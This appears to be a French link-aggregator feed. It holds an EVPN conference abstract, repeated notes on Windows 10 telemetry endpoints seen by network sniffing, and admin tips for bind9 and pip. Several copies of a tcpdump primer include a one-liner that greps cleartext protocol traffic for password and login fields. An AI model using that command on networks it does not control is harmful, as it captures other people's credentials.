Ethernet VPN (EVPN RFC 7432) est un service de VPN niveau 2 multi-points dont l’adoption se développe, car il corrige des limitations de VPLS et ajoute de nouvelles fonctionnalités spécifiques à la gestion des clouds et data-centers, tout en offrant un meilleur passage à l’échelle. Nous vous présenterons plusieurs cas d’usage pour la communauté éducation/recherche : service L2VPN multi-points chez un opérateur, fabrique de data-center, utilisation d’un cœur distribué, interconnexion de data-centers (PRA, …), L2VPN sur WAN IP, service de peering et point d’interconnexion.

Un retour d’expérience sur l’utilisation d’une fabrique de data-center basée sur EVPN/VXLAN sera présentée par l’université de Bourgogne. EVPN et PBB-EVPN ont été testés sur l’infrastructure MD-VPN qui permet de déployer des VPN de niveau 2/3 sur 16 pays. La démonstration de fonctionnalités avancées comme le //multi-homing actif/actif//, la répartition de charge par flux seront aussi présentées et particulièrement la migration de machines virtuelles à travers l’Europe par l’université de Nantes. Enfin, parmi les architectures d’interconnexion de data-centers, nous soulignerons la flexibilité des solutions basées sur VXLAN.

EVPN et d’autres types de VPN sont aussi utiles pour interconnecter directement un système d’information (une université, par exemple) à un fournisseur de clouds (académique/commercial), dans un modèle de cloud hybride. Dans ce contexte de fourniture rapide de machines, l’automatisation et l’orchestration de la fourniture de VPN prend tout son sens.

Ces techniques sont donc à considérer pour l’architecture et l’interconnexion de data-centers, la connexion d’un système d’information à un cloud, mais aussi pour le développement en général de l’usage de ressources distribuées (stockage/computing).

Permalink

Oros links Note: Mise sous écoute d'un windows 10 Partie 1 - Oros links - Liandri's Links.
Compte local.
J'ai simplement pris une VM ici https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ et je l'ai lancé sans rien toucher.
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 4
Suite de https://ecirtam.net/links/?nTNSTw

Quelques paquets bien bavard. Ils apparaissent assez souvent.

```
https://storeedgefd.dsx.mp.microsoft.com/v8.0/products/9WZDNCRD2G0J?
appversion=11712.1001.0.0
&idType=ProductId
&market=FR
&locale=en-US
&deviceType=
&deviceFamily=Windows.Desktop
&catalogLocales=en-US%2Cfr-FR
&hardware=arm0%2Carm640%2Cble0%2Ccmb0%2Ccmf0%2Ccmr0%2Cdcb1%2Cdcc1%2Cdx91%2Cdxa1%2Cdxb1%2Cgyr0%2Chce0%2Chdc0%2Chov0%2Chsa0%2Chss1%2Ckbd1%2Cm041%2Cm060%2Cm080%2Cm120%2Cm160%2Cm200%2Cm301%2Cm751%2CmA01%2Cmct0%2Cmgn0%2Cmic0%2Cmrc0%2Cmse1%2CmT01%2Cnfc0%2Crs10%2Crs20%2Crs30%2Crs40%2Crs50%2Crs60%2Ctch0%2Ctel0%2Cv010%2Cv020%2Cv040%2Cx641%2Cx860%2Cx86a640%2Cxbd0%2Cxbo0%2Cxbs0%2Cxbx0%2Cxgp0
&packageHardware=dcb%2Cdcc%2Cdx9%2Cdxa%2Cdxb%2Cm30%2Cm75%2CmA0%2CmT0
&deviceFamilyVersion=2815750935277839
&preciseDeviceFamilyVersion=2814750991000385
&architecture=x64
```

```
https://arc.msn.com/v3/Delivery/Placement?
pubid=da76df93-3dbc-42ab-a525-b34988683ac7
&pid=356481
&adm=2
&w=1
&h=1
&wpx=1
&hpx=1
&fmt=json
&cltp=app
&dim=le
&rafb=0
&nct=1
&pm=1
&cfmt=text,image,poly
&sft=jpeg,png,gif
&topt=0
&auid=547864bf7a5d727d6d78cda7f88cfce2
&poptin=1
&localid=w:8CA61C5C-685A-8431-C29F-E8EAD3C93E71
&ctry=FR
&time=20181002T135651Z
&lc=en-US
&pl=en-US,fr-FR
&idtp=mid
&uid=505bb224-4f5b-461c-b4cf-0ade15573bc2
&aid=00000000-0000-0000-0000-000000000000
&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29
&asid=20192b9a73874553bf127674f0276fb4
&ctmode=MultiSession
&arch=x64
&cdm=1
&cdmver=10.0.17134.1
&devfam=Windows.Desktop
&devform=Unknown
&devosver=10.0.17134.1
&disphorzres=800
&dispsize=10.4
&dispvertres=600
&isu=1
&lo=232284
&metered=false
&nettype=ethernet
&npid=sc-356481
&oemName=innotek%20GmbH
&oemid=innotek%20GmbH
&ossku=EnterpriseEval
&smBiosDm=VirtualBox
&tl=4
&tsu=230264
&waasBldFlt=1
&waasCfgExp=1
&waasCfgSet=1
&waasRetail=1
&waasRing=
```
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 4
Suite de https://ecirtam.net/links/?nTNSTw

Quelques paquets bien bavard. Ils apparaissent assez souvent.

```
https://storeedgefd.dsx.mp.microsoft.com/v8.0/products/9WZDNCRD2G0J?
appversion=11712.1001.0.0
&idType=ProductId
&market=FR
&locale=en-US
&deviceType=
&deviceFamily=Windows.Desktop
&catalogLocales=en-US%2Cfr-FR
&hardware=arm0%2Carm640%2Cble0%2Ccmb0%2Ccmf0%2Ccmr0%2Cdcb1%2Cdcc1%2Cdx91%2Cdxa1%2Cdxb1%2Cgyr0%2Chce0%2Chdc0%2Chov0%2Chsa0%2Chss1%2Ckbd1%2Cm041%2Cm060%2Cm080%2Cm120%2Cm160%2Cm200%2Cm301%2Cm751%2CmA01%2Cmct0%2Cmgn0%2Cmic0%2Cmrc0%2Cmse1%2CmT01%2Cnfc0%2Crs10%2Crs20%2Crs30%2Crs40%2Crs50%2Crs60%2Ctch0%2Ctel0%2Cv010%2Cv020%2Cv040%2Cx641%2Cx860%2Cx86a640%2Cxbd0%2Cxbo0%2Cxbs0%2Cxbx0%2Cxgp0
&packageHardware=dcb%2Cdcc%2Cdx9%2Cdxa%2Cdxb%2Cm30%2Cm75%2CmA0%2CmT0
&deviceFamilyVersion=2815750935277839
&preciseDeviceFamilyVersion=2814750991000385
&architecture=x64
```

```
https://arc.msn.com/v3/Delivery/Placement?
pubid=da76df93-3dbc-42ab-a525-b34988683ac7
&pid=356481
&adm=2
&w=1
&h=1
&wpx=1
&hpx=1
&fmt=json
&cltp=app
&dim=le
&rafb=0
&nct=1
&pm=1
&cfmt=text,image,poly
&sft=jpeg,png,gif
&topt=0
&auid=547864bf7a5d727d6d78cda7f88cfce2
&poptin=1
&localid=w:8CA61C5C-685A-8431-C29F-E8EAD3C93E71
&ctry=FR
&time=20181002T135651Z
&lc=en-US
&pl=en-US,fr-FR
&idtp=mid
&uid=505bb224-4f5b-461c-b4cf-0ade15573bc2
&aid=00000000-0000-0000-0000-000000000000
&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29
&asid=20192b9a73874553bf127674f0276fb4
&ctmode=MultiSession
&arch=x64
&cdm=1
&cdmver=10.0.17134.1
&devfam=Windows.Desktop
&devform=Unknown
&devosver=10.0.17134.1
&disphorzres=800
&dispsize=10.4
&dispvertres=600
&isu=1
&lo=232284
&metered=false
&nettype=ethernet
&npid=sc-356481
&oemName=innotek%20GmbH
&oemid=innotek%20GmbH
&ossku=EnterpriseEval
&smBiosDm=VirtualBox
&tl=4
&tsu=230264
&waasBldFlt=1
&waasCfgExp=1
&waasCfgSet=1
&waasRetail=1
&waasRing=
```

Suite https://ecirtam.net/links/?RSVxiA
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 3. Rien à cacher ?
Suite de https://ecirtam.net/links/?1wRTPw

Les post-it de windows et la barre de recherche envoient tout Microsoft.
https://ecirtam.net/links/myimg/win10_postit.png
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 3. Rien à cacher ?
Suite de https://ecirtam.net/links/?1wRTPw

Les post-it de windows et la barre de recherche envoient tout Microsoft.
https://ecirtam.net/links/myimg/win10_postit.png

Suite : https://ecirtam.net/links/?YgWg9Q
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 2
Suite de https://ecirtam.net/links/?U23nFA

Liste un peut plus complète des sites appelés par Windows 10.
Note mitn.lan est le nom du réseau local.

```
_ldap._tcp.dc._msdcs.mitn.lan
a-ring-fallback.msedge.net
a-ring.msedge.net
a3698060313.cdn.optimizely.com
activation-v2.sls.microsoft.com
ad.sxp.smartclip.net
adl.windows.com
ajax.aspnetcdn.com
appexmapsappupdate.blob.core.windows.net
arc.msn.com
auth.gfx.ms
az416426.vo.msecnd.net
az725175.vo.msecnd.net
b-ring.msedge.net
bailfjjeqfhhl.mitn.lan
c.bing.com
c.urs.microsoft.com
canonicalizer.ucsuri.tcs
casual-solitaire.cloudapp.net
cdn.onenote.net
cdn.optimizely.com
cdnjs.cloudflare.com
client-office365-tas.msedge.net
client.wns.windows.com
cloudfront-vs-afd.azurefd.net
cm.g.doubleclick.net
code.jquery.com
compass-ssl.microsoft.com
config.edge.skype.com
connect.facebook.net
contentstorage.osi.office.net
crl.verisign.com
ctldl.windowsupdate.com
d1l0kcze0h5pmt.cloudfront.net
definitionupdates.microsoft.com
dev.virtualearth.net
dis.criteo.com
displaycatalog.mp.microsoft.com
dmd.metaservices.microsoft.com
dns.msftncsi.com
download-ssl.msgamestudios.com
ecn.dev.virtualearth.net
edgewelcomecdn.microsoft.com
endpoint-quwfbp3teyq4e.azureedge.net
europe.smartscreen-prod.microsoft.com
exo-ring.msedge.net
fp-afd.azureedge.net
fp-vp.azureedge.net
fp-vs.azureedge.net
fp.msedge.net
fs.microsoft.com
g.live.com
go.microsoft.com
ib.adnxs.com
iecvlist.microsoft.com
img-prod-cms-rt-microsoft-com.akamaized.net(192.168.58.254)
inference.location.live.net
insights.notes.microsoft.com
l-ring.msedge.net
livetileedge.dsx.mp.microsoft.com
login.live.com
logx.optimizely.com
m.adnxs.com
markets.books.microsoft.com
match.adsrvr.org
microsoftcasualgames.com
microsoftedgewelcome.microsoft.com
mitn.lan
nav.smartscreen.microsoft.com
nexusrules.officeapps.live.com
o-ring.msedge.net
ocos-office365-s2s.msedge.net
ocsp.digicert.com
ocsp.verisign.com
officeclient.microsoft.com
oneclient.sfx.ms
onecs-live.azureedge.net
outlookmobile-office365-tas.msedge.net
ow1.res.office365.com
pixeltrack.eyeviewads.com
privacy.microsoft.com
q-ring-fallback.msedge.net
q-ring.msedge.net
qbiaovisdlh.mitn.lan
query.prod.cms.rt.microsoft.com
ris.api.iris.microsoft.com
rum8.perf.linkedin.com
s-ring.msedge.net
s1.symcb.com
s2.symcb.com
sb.scorecardresearch.com
segments-s.msedge.net
settings-win.data.microsoft.com
settings.data.microsoft.com
sf.symcb.com
sf.symcd.com
site-cdn.onenote.net
sls.update.microsoft.com
sls.update.microsoft.com
soavqlqthzdqx.mitn.lan
spo-ring.msedge.net
store-images.microsoft.com
store-images.s-microsoft.com
storeedgefd.dsx.mp.microsoft.com
sv.symcb.com
sv.symcd.com
sync.outbrain.com
sync.search.spotxchange.com
t-ring.msedge.net
t0.ssl.ak.dynamic.tiles.virtualearth.net
t0.ssl.ak.tiles.virtualearth.net
t1.ssl.ak.tiles.virtualearth.net
t2.ssl.ak.tiles.virtualearth.net
tile-service.weather.microsoft.com
track.eyeviewads.com
trc.taboola.com
v10.events.data.microsoft.com
v10.events.data.microsoft.com
validation-v2.sls.microsoft.com
watson.telemetry.microsoft.com
wdcp.microsoft.com
wdcpalt.microsoft.com
web.vortex.data.microsoft.com
wpad.mitn.lan
wpad.mitn.lan
www.bing.com
www.facebook.com
www.googleapis.com
www.microsoft.com
www.msftconnecttest.com
www.msn.com
www.windowssearch.com
www.xboxab.com
www2.bing.com
xqmamtfwmp.mitn.lan
```

Suite : https://ecirtam.net/links/?nTNSTw
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 2
Suite de https://ecirtam.net/links/?U23nFA

Liste un peut plus complète des sites appelés par Windows 10.
Note mitn.lan est le nom du réseau local.

```
_ldap._tcp.dc._msdcs.mitn.lan
a-ring-fallback.msedge.net
a-ring.msedge.net
a3698060313.cdn.optimizely.com
activation-v2.sls.microsoft.com
ad.sxp.smartclip.net
adl.windows.com
ajax.aspnetcdn.com
appexmapsappupdate.blob.core.windows.net
arc.msn.com
auth.gfx.ms
az416426.vo.msecnd.net
az725175.vo.msecnd.net
b-ring.msedge.net
bailfjjeqfhhl.mitn.lan
c.bing.com
c.urs.microsoft.com
canonicalizer.ucsuri.tcs
casual-solitaire.cloudapp.net
cdn.onenote.net
cdn.optimizely.com
cdnjs.cloudflare.com
client-office365-tas.msedge.net
client.wns.windows.com
cloudfront-vs-afd.azurefd.net
cm.g.doubleclick.net
code.jquery.com
compass-ssl.microsoft.com
config.edge.skype.com
connect.facebook.net
contentstorage.osi.office.net
crl.verisign.com
ctldl.windowsupdate.com
d1l0kcze0h5pmt.cloudfront.net
definitionupdates.microsoft.com
dev.virtualearth.net
dis.criteo.com
displaycatalog.mp.microsoft.com
dmd.metaservices.microsoft.com
dns.msftncsi.com
download-ssl.msgamestudios.com
ecn.dev.virtualearth.net
edgewelcomecdn.microsoft.com
endpoint-quwfbp3teyq4e.azureedge.net
europe.smartscreen-prod.microsoft.com
exo-ring.msedge.net
fp-afd.azureedge.net
fp-vp.azureedge.net
fp-vs.azureedge.net
fp.msedge.net
fs.microsoft.com
g.live.com
go.microsoft.com
ib.adnxs.com
iecvlist.microsoft.com
img-prod-cms-rt-microsoft-com.akamaized.net
inference.location.live.net
insights.notes.microsoft.com
l-ring.msedge.net
livetileedge.dsx.mp.microsoft.com
login.live.com
logx.optimizely.com
m.adnxs.com
markets.books.microsoft.com
match.adsrvr.org
microsoftcasualgames.com
microsoftedgewelcome.microsoft.com
mitn.lan
nav.smartscreen.microsoft.com
nexusrules.officeapps.live.com
o-ring.msedge.net
ocos-office365-s2s.msedge.net
ocsp.digicert.com
ocsp.verisign.com
officeclient.microsoft.com
oneclient.sfx.ms
onecs-live.azureedge.net
outlookmobile-office365-tas.msedge.net
ow1.res.office365.com
pixeltrack.eyeviewads.com
privacy.microsoft.com
q-ring-fallback.msedge.net
q-ring.msedge.net
qbiaovisdlh.mitn.lan
query.prod.cms.rt.microsoft.com
ris.api.iris.microsoft.com
rum8.perf.linkedin.com
s-ring.msedge.net
s1.symcb.com
s2.symcb.com
sb.scorecardresearch.com
segments-s.msedge.net
settings-win.data.microsoft.com
settings.data.microsoft.com
sf.symcb.com
sf.symcd.com
site-cdn.onenote.net
sls.update.microsoft.com
sls.update.microsoft.com
soavqlqthzdqx.mitn.lan
spo-ring.msedge.net
store-images.microsoft.com
store-images.s-microsoft.com
storeedgefd.dsx.mp.microsoft.com
sv.symcb.com
sv.symcd.com
sync.outbrain.com
sync.search.spotxchange.com
t-ring.msedge.net
t0.ssl.ak.dynamic.tiles.virtualearth.net
t0.ssl.ak.tiles.virtualearth.net
t1.ssl.ak.tiles.virtualearth.net
t2.ssl.ak.tiles.virtualearth.net
tile-service.weather.microsoft.com
track.eyeviewads.com
trc.taboola.com
v10.events.data.microsoft.com
v10.events.data.microsoft.com
validation-v2.sls.microsoft.com
watson.telemetry.microsoft.com
wdcp.microsoft.com
wdcpalt.microsoft.com
web.vortex.data.microsoft.com
wpad.mitn.lan
www.bing.com
www.facebook.com
www.googleapis.com
www.microsoft.com
www.msftconnecttest.com
www.msn.com
www.windowssearch.com
www.xboxab.com
www2.bing.com
xqmamtfwmp.mitn.lan
```

Suite : https://ecirtam.net/links/?nTNSTw
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 2
Suite de https://ecirtam.net/links/?U23nFA

Liste un peut plus complète des sites appelés par Windows 10.
Note mitn.lan est le nom du réseau local.

```
_ldap._tcp.dc._msdcs.mitn.lan
a-ring-fallback.msedge.net
a-ring.msedge.net
a3698060313.cdn.optimizely.com
activation-v2.sls.microsoft.com
ad.sxp.smartclip.net
adl.windows.com
ajax.aspnetcdn.com
appexmapsappupdate.blob.core.windows.net
arc.msn.com
auth.gfx.ms
az416426.vo.msecnd.net
az725175.vo.msecnd.net
b-ring.msedge.net
bailfjjeqfhhl.mitn.lan
c.bing.com
c.urs.microsoft.com
canonicalizer.ucsuri.tcs
casual-solitaire.cloudapp.net
cdn.onenote.net
cdn.optimizely.com
cdnjs.cloudflare.com
client-office365-tas.msedge.net
client.wns.windows.com
cloudfront-vs-afd.azurefd.net
cm.g.doubleclick.net
code.jquery.com
compass-ssl.microsoft.com
config.edge.skype.com
connect.facebook.net
contentstorage.osi.office.net
crl.verisign.com
ctldl.windowsupdate.com
d1l0kcze0h5pmt.cloudfront.net
definitionupdates.microsoft.com
dev.virtualearth.net
dis.criteo.com
displaycatalog.mp.microsoft.com
dmd.metaservices.microsoft.com
dns.msftncsi.com
download-ssl.msgamestudios.com
ecn.dev.virtualearth.net
edgewelcomecdn.microsoft.com
endpoint-quwfbp3teyq4e.azureedge.net
europe.smartscreen-prod.microsoft.com
exo-ring.msedge.net
fp-afd.azureedge.net
fp-vp.azureedge.net
fp-vs.azureedge.net
fp.msedge.net
fs.microsoft.com
g.live.com
go.microsoft.com
ib.adnxs.com
iecvlist.microsoft.com
img-prod-cms-rt-microsoft-com.akamaized.net
inference.location.live.net
insights.notes.microsoft.com
l-ring.msedge.net
livetileedge.dsx.mp.microsoft.com
login.live.com
logx.optimizely.com
m.adnxs.com
markets.books.microsoft.com
match.adsrvr.org
microsoftcasualgames.com
microsoftedgewelcome.microsoft.com
mitn.lan
nav.smartscreen.microsoft.com
nexusrules.officeapps.live.com
o-ring.msedge.net
ocos-office365-s2s.msedge.net
ocsp.digicert.com
ocsp.verisign.com
officeclient.microsoft.com
oneclient.sfx.ms
onecs-live.azureedge.net
outlookmobile-office365-tas.msedge.net
ow1.res.office365.com
pixeltrack.eyeviewads.com
privacy.microsoft.com
q-ring-fallback.msedge.net
q-ring.msedge.net
qbiaovisdlh.mitn.lan
query.prod.cms.rt.microsoft.com
ris.api.iris.microsoft.com
rum8.perf.linkedin.com
s-ring.msedge.net
s1.symcb.com
s2.symcb.com
sb.scorecardresearch.com
segments-s.msedge.net
settings-win.data.microsoft.com
settings.data.microsoft.com
sf.symcb.com
sf.symcd.com
site-cdn.onenote.net
sls.update.microsoft.com
sls.update.microsoft.com
soavqlqthzdqx.mitn.lan
spo-ring.msedge.net
store-images.microsoft.com
store-images.s-microsoft.com
storeedgefd.dsx.mp.microsoft.com
sv.symcb.com
sv.symcd.com
sync.outbrain.com
sync.search.spotxchange.com
t-ring.msedge.net
t0.ssl.ak.dynamic.tiles.virtualearth.net
t0.ssl.ak.tiles.virtualearth.net
t1.ssl.ak.tiles.virtualearth.net
t2.ssl.ak.tiles.virtualearth.net
tile-service.weather.microsoft.com
track.eyeviewads.com
trc.taboola.com
v10.events.data.microsoft.com
v10.events.data.microsoft.com
validation-v2.sls.microsoft.com
watson.telemetry.microsoft.com
wdcp.microsoft.com
wdcpalt.microsoft.com
web.vortex.data.microsoft.com
wpad.mitn.lan
www.bing.com
www.facebook.com
www.googleapis.com
www.microsoft.com
www.msftconnecttest.com
www.msn.com
www.windowssearch.com
www.xboxab.com
www2.bing.com
xqmamtfwmp.mitn.lan
```

Emplacement des serveurs : https://ecirtam.net/links/?RSVxiA

Suite : https://ecirtam.net/links/?nTNSTw
Permalink
Oros links Note: Mise sous écoute d'un windows 10
J'ai fais une écoute réseau d'un windows 10 build 17134.rs4_release.180410-1804.
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Voici la liste des serveurs au quel il se connecte au démarrage :

# Adresses inconnues (mitn.lan == mon réseau local)

_ldap._tcp.dc._msdcs.mitn.lan
soavqlqthzdqx.mitn.lan
wpad.mitn.lan
canonicalizer.ucsuri.tcs


# Microsoft (https://docs.microsoft.com/en-us/windows/privacy/manage-windows-endpoints)

fs.microsoft.com                ; 23.210.40.121   ; France, Paris           ; Font streaming
go.microsoft.com                ; 23.223.224.178  ; France, Paris           ; Windows Defender

iecvlist.microsoft.com          ; 152.199.19.161  ; USA, Ashburn            ; ?
g.live.com                      ; 65.55.108.210   ; USA, Boydton            ; OneDrive
v10.events.data.microsoft.com   ; 13.68.93.109    ; USA, Boydton            ; ?
activation-v2.sls.microsoft.com ; 65.52.98.233    ; USA, Cheyenne           ; ?
www.bing.com                    ; 13.78.130.220   ; USA, Cheyenne           ; Cortana and Search
config.edge.skype.com           ; 13.107.3.128    ; USA, Redmond            ; Skype
dns.msftncsi.com                ; 131.107.255.255 ; USA, Redmond            ; dns
www.msftconnecttest.com         ; 13.107.21.200   ; USA, Redmond            ; test de connexion
watson.telemetry.microsoft.com  ; 52.114.128.43   ; USA, West Des Moines    ; Diagnostic Data

settings-win.data.microsoft.com ; 52.138.216.83   ; Ireland, Dublin         ; Settings
sls.update.microsoft.com        ; 52.138.216.83   ; Ireland, Dublin         ; Windows Update
inference.location.live.net     ; 40.112.71.128   ; Ireland, Dublin         ; ?
c.urs.microsoft.com             ; 40.112.74.45    ; Ireland, Dublin         ; ?

nav.smartscreen.microsoft.com   ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
onecs-live.azureedge.net        ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
client-office365-tas.msedge.net ; 52.232.69.150   ; Netherlands, Amsterdam  ; Office
Permalink
Oros links Note: Mise sous écoute d'un windows 10
J'ai fais une écoute réseau d'un windows 10 build 17134.rs4_release.180410-1804.
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Voici la liste des serveurs au quel il se connecte au démarrage :

# Adresses inconnues (mitn.lan == mon réseau local)

_ldap._tcp.dc._msdcs.mitn.lan
soavqlqthzdqx.mitn.lan, fteqzgtmomwsj.mitn.lan, sbnaxxbhslo.mitn.lan, ygdgatupsifnoow.mitn.lan, ....
wpad.mitn.lan
canonicalizer.ucsuri.tcs


# Microsoft (https://docs.microsoft.com/en-us/windows/privacy/manage-windows-endpoints)

fs.microsoft.com                ; 23.210.40.121   ; France, Paris           ; Font streaming
go.microsoft.com                ; 23.223.224.178  ; France, Paris           ; Windows Defender

iecvlist.microsoft.com          ; 152.199.19.161  ; USA, Ashburn            ; ?
g.live.com                      ; 65.55.108.210   ; USA, Boydton            ; OneDrive
v10.events.data.microsoft.com   ; 13.68.93.109    ; USA, Boydton            ; ?
activation-v2.sls.microsoft.com ; 65.52.98.233    ; USA, Cheyenne           ; ?
www.bing.com                    ; 13.78.130.220   ; USA, Cheyenne           ; Cortana and Search
config.edge.skype.com           ; 13.107.3.128    ; USA, Redmond            ; Skype
dns.msftncsi.com                ; 131.107.255.255 ; USA, Redmond            ; dns
www.msftconnecttest.com         ; 13.107.21.200   ; USA, Redmond            ; test de connexion
watson.telemetry.microsoft.com  ; 52.114.128.43   ; USA, West Des Moines    ; Diagnostic Data

settings-win.data.microsoft.com ; 52.138.216.83   ; Ireland, Dublin         ; Settings
sls.update.microsoft.com        ; 52.138.216.83   ; Ireland, Dublin         ; Windows Update
inference.location.live.net     ; 40.112.71.128   ; Ireland, Dublin         ; ?
c.urs.microsoft.com             ; 40.112.74.45    ; Ireland, Dublin         ; ?

nav.smartscreen.microsoft.com   ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
onecs-live.azureedge.net        ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
client-office365-tas.msedge.net ; 52.232.69.150   ; Netherlands, Amsterdam  ; Office
Permalink
Oros links Note: Mise sous écoute d'un windows 10 Partie 1
J'ai fais une écoute réseau d'un windows 10 build 17134.rs4_release.180410-1804.
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Voici la liste des serveurs au quel il se connecte au démarrage :

# Adresses inconnues (mitn.lan == mon réseau local)

_ldap._tcp.dc._msdcs.mitn.lan
soavqlqthzdqx.mitn.lan, fteqzgtmomwsj.mitn.lan, sbnaxxbhslo.mitn.lan, ygdgatupsifnoow.mitn.lan, ....
wpad.mitn.lan
canonicalizer.ucsuri.tcs


# Microsoft (https://docs.microsoft.com/en-us/windows/privacy/manage-windows-endpoints)

fs.microsoft.com                ; 23.210.40.121   ; France, Paris           ; Font streaming
go.microsoft.com                ; 23.223.224.178  ; France, Paris           ; Windows Defender

iecvlist.microsoft.com          ; 152.199.19.161  ; USA, Ashburn            ; ?
g.live.com                      ; 65.55.108.210   ; USA, Boydton            ; OneDrive
v10.events.data.microsoft.com   ; 13.68.93.109    ; USA, Boydton            ; ?
activation-v2.sls.microsoft.com ; 65.52.98.233    ; USA, Cheyenne           ; ?
www.bing.com                    ; 13.78.130.220   ; USA, Cheyenne           ; Cortana and Search
config.edge.skype.com           ; 13.107.3.128    ; USA, Redmond            ; Skype
dns.msftncsi.com                ; 131.107.255.255 ; USA, Redmond            ; dns
www.msftconnecttest.com         ; 13.107.21.200   ; USA, Redmond            ; test de connexion
watson.telemetry.microsoft.com  ; 52.114.128.43   ; USA, West Des Moines    ; Diagnostic Data

settings-win.data.microsoft.com ; 52.138.216.83   ; Ireland, Dublin         ; Settings
sls.update.microsoft.com        ; 52.138.216.83   ; Ireland, Dublin         ; Windows Update
inference.location.live.net     ; 40.112.71.128   ; Ireland, Dublin         ; ?
c.urs.microsoft.com             ; 40.112.74.45    ; Ireland, Dublin         ; ?

nav.smartscreen.microsoft.com   ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
onecs-live.azureedge.net        ; 52.232.101.203  ; Netherlands, Amsterdam  ; ?
client-office365-tas.msedge.net ; 52.232.69.150   ; Netherlands, Amsterdam  ; Office

Partie 2 https://ecirtam.net/links/?1wRTPw
Permalink
Oros links Note: Activer les logs dans bind9
En root :
```
mkdir -p /var/log/bind/
chown -R bind:bind /var/log/bind/
chmod -R 755 /var/log/bind/

echo '
logging {
    channel queries_file {
        file "/var/log/bind/queries.log" versions 3 size 5m;
        severity dynamic;
        print-time yes;
    };
    category queries { queries_file; };
};
' >> /etc/bind/named.conf.local
systemctl restart bind9
```
Permalink
Les bons liens du Gégé Le guide des bonnes pratiques de configuration de BGP | Agence nationale de la sécurité des systèmes d'information

Les travaux de l’observatoire de la résilience de l’Internet français ont conduit l’ANSSI et les opérateurs de communication partenaires l’Association Kazar, France-IX, Jaguar Network, Neo Telecoms, Orange, RENATER et SFR à concevoir une définition des bonnes pratiques d’interconnexion entre opérateurs (interconnexion BGP).

En effet, la façon dont sont configurés les équipements qui assurent les échanges entre opérateurs conditionne aussi les capacités de détection ou de prévention des erreurs. Cela signifie donc qu’elle contribue à la résilience de l’Internet.

Le guide propose des exemples concrets de configuration correspondant aux bonnes pratiques à développer pour les principaux équipements du commerce.

L’ANSSI encourage les acteurs de l’Internet à s’approprier ces recommandations pour les appliquer dès que cela est envisageable.
Permalink

Oros links Restreindre la collecte de données sous Windows 10 | Agence nationale de la sécurité des systèmes d'information

Permalink
Oros links DWService - Accès à distance, Administration à distance, Support à distance
Alternative à TeamViewer
via http://sebsauvage.net/links/?jLoq0Q
Permalink
Shaarli ¦ Orangina Rouge python - Using pip behind a proxy - Stack Overflow

pip --proxy http://192.168.128.254:3128 install progress
Permalien

Shaarli ¦ Orangina Rouge python - Using pip behind a proxy - Stack Overflow

pip --proxy http://192.168.128.254:3128 install progress
Permalien

Olivier Dᴏꜱꜱᴍᴀɴɴ Jeu d'échec utilisant ActivityPub

Permalien
Olivier Dᴏꜱꜱᴍᴀɴɴ Jeu d'échec utilisant ActivityPub

Permalink
Librement Shaarli Monitor Network Traffic with Ntopng on Ubuntu 18.04 LTS
Bien envie d'essayer !
Permalink
L!NKS 18 commands to monitor network bandwidth on Linux server – BinaryTides
(Permalink)
Oros links A tcpdump Tutorial and Primer with Examples - Daniel Miessler
sudo tcpdump -s0 port 53
sudo tcpdump -vvAls0 | grep 'Host:'
sudo tcpdump -vvAls0 | grep 'User-Agent:'
sudo tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
Permalink
Oros links A tcpdump Tutorial and Primer with Examples - Daniel Miessler
sudo tcpdump -s0 port 53
sudo tcpdump -vvAls0 | grep 'Host:'
sudo tcpdump -vvAls0 | grep 'User-Agent:'
sudo tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

#crée des fichiers de 10Mo
sudo tcpdump -Z $USER -C 10 -qUw capture.pcap

tcpdump -r capture.pcap -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
https://hackertarget.com/tcpdump-examples/
Permalink
Oros links A tcpdump Tutorial and Primer with Examples - Daniel Miessler
sudo tcpdump -s0 port 53
sudo tcpdump -vvAls0 | grep 'Host:'
sudo tcpdump -vvAls0 | grep 'User-Agent:'
sudo tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

#crée des fichiers de 10Mo
sudo tcpdump -Z $USER -C 10 -qUw capture.pcap

tcpdump -r capture.pcap -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
https://hackertarget.com/tcpdump-examples/

# Pour exporter les pages web du capture.pcap :
# dans wireshark, ouvrir le capture.pcap, puis Fichier > Exporter Objets > HTTP... > Save All
Permalink
Oros links New Spectre attack enables secrets to be leaked over a network | Ars Technica

Permalink
Les bons liens du Gégé RFC 7143: iSCSI Protocol (Consolidated)
Oros links Windows 10 connection endpoints | Microsoft Docs
via https://lehollandaisvolant.net/?id=20180724102409
Permalink
Tibiaster djanybekensis (19) Pinterest

Permalink
Les bons liens du Gégé Fixing bufferbloat on your home network with OpenBSD 6.2 or newer · Paul Smith
Oros links noisy/noisy.py at master · 1tayH/noisy · GitHub
via https://korben.info/generer-du-bruit-de-fond-pour-polluer-les-datas-recoltees-par-les-boites-noires.html
Permalink
Shaarli ¦ Orangina Rouge Note: Comment créer un compte facebook facilement

Besoin de créer un compte FB « vide » ?
Voici facilement en 3 étapes :

